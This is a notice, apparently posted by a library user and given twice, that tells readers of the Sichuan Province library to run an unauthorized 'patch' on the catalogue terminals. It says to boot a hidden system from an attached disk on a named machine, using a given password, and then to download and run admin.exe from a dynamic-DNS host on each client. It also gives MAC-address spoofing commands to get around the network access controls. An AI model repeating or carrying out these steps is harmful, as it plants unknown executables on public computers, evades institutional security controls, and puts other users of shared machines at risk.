

Hei readers:

Welcome to the Sichuan Province library, today is July 16, 2024 and I'm pleased to make your acquaintance

I want to share some things that you should know because I'm about to leave this city and never come back:

1. I patched the front-end code of opac.sclib.org so that you can let book covers display properly as they should.



But unfortunately, you need to start it manually every day. Why?

To hijack the PXE DHCPDISCOVER packet and inject payload every morning is technically possible.

But I'm not recommend to do that before consulting your lawyer about the following Criminal Law of the People's Republic of China offenses:

- illegally accessing computer systems (Article 285);
-
- illegally accessing or controlling data held on computer systems (Article 285);
- providing programs and tools to access or illegally control computer systems (Article 285);
- destroying computer systems (Article 286);

Follow these steps to apply my patches one time for each book search client per day:

Step 1: boot API server system

We have two servers for handling load balancing requests now, at least one machine up is required. The first one: Please walk to machine "64:00:6A:24:07:C1" located at Chinese book view room 3 (near the window side) Press F12 while the boot process, start a one-time boot to Toshiba 500GB 2.5-inch HDD and wait for a while ... input the password "fuckkali" to unlock "/" lvm partition and continue to boot. After the system booted do nothing and walk away. The second one: located at the foreign&TW&HKSAR books view room

1	2	3	4	W
5	[6]	7	8	E

Step 2: Download and execute the client script to apply

Go to each client and open <http://ia32.duckdns.org:8000/admin.exe> to download script

* (If you are not sure md5: 3ece3beb47708fa6972162843a377c7f)

Then execute admin.exe hit "开始" and enjoy

2. If you want to know how to access the internet using Ethernet Cable :

A. Proxy or Virtual Private Network

Every wireless client can access the internet

B. Change/Spoofing Mac address

There are some clients allowed to access the Internet by the SANGFOR network behavior management system for example:

ip link set dev [your wired network interface] down

ip link set dev [your wired network interface] address 64:00:6a:30:19:aa

ip link set dev [your wired network interface] up

If someone is using that machine don't do it you'll get a conflict, ping it (192.168.122.58) before

<https://0x0.st/XfuJ.pdf>

Thank you for your attention. And enjoy your reading

Another reader



Hei readers:

Welcome to the Sichuan Province library, today is July 16, 2024 and I'm pleased to make your acquaintance

I want to share some things that you should know because I'm about to leave this city and never come back:

1. I patched the front-end code of opac.sclib.org so that you can let book covers display properly as they should.



But unfortunately, you need to start it manually every day. Why?

To hijack the PXE DHCPDISCOVER packet and inject payload every morning is technically possible.

But I'm not recommend to do that before consulting your lawyer about the following Criminal Law of the People's Republic of China offenses:

- illegally accessing computer systems (Article 285);
- illegally accessing or controlling data held on computer systems (Article 285);
- providing programs and tools to access or illegally control computer systems (Article 285);
- destroying computer systems (Article 286);

Follow these steps to apply my patches one time for each book search client per day:

Step 1: boot API server system

We have two servers for handling load balancing requests now, at least one machine up is required. The first one: Please walk to machine "64:00:6A:24:07:C1" located at Chinese book view room 3 (near the window side) Press F12 while the boot process, start a one-time boot to Toshiba 500GB 2.5-inch HDD and wait for a while ... input the password "fuckkali" to unlock "/" lvm partition and continue to boot. After the system booted do nothing and walk away. The second one: located at the foreign&TW&HKSAR books view room

1	2	3	4	W
5	[6]	7	8	E

Step 2: Download and execute the client script to apply

Go to each client and open <http://ia32.duckdns.org:8000/admin.exe> to download script

* (If you are not sure md5: 3ece3beb47708fa6972162843a377c7f)

Then execute admin.exe hit "开始" and enjoy

2. If you want to know how to access the internet using Ethernet Cable :

A. Proxy or Virtual Private Network

Every wireless client can access the internet

B. Change/Spoofing Mac address

There are some clients allowed to access the Internet by the SANGFOR network behavior management system for example:

ip link set dev [your wired network interface] down

ip link set dev [your wired network interface] address 64:00:6a:30:19:aa

ip link set dev [your wired network interface] up

If someone is using that machine don't do it you'll get a conflict, ping it (192.168.122.58) before

<https://0x0.st/XfuJ.pdf>

Thank you for your attention. And enjoy your reading

Another reader

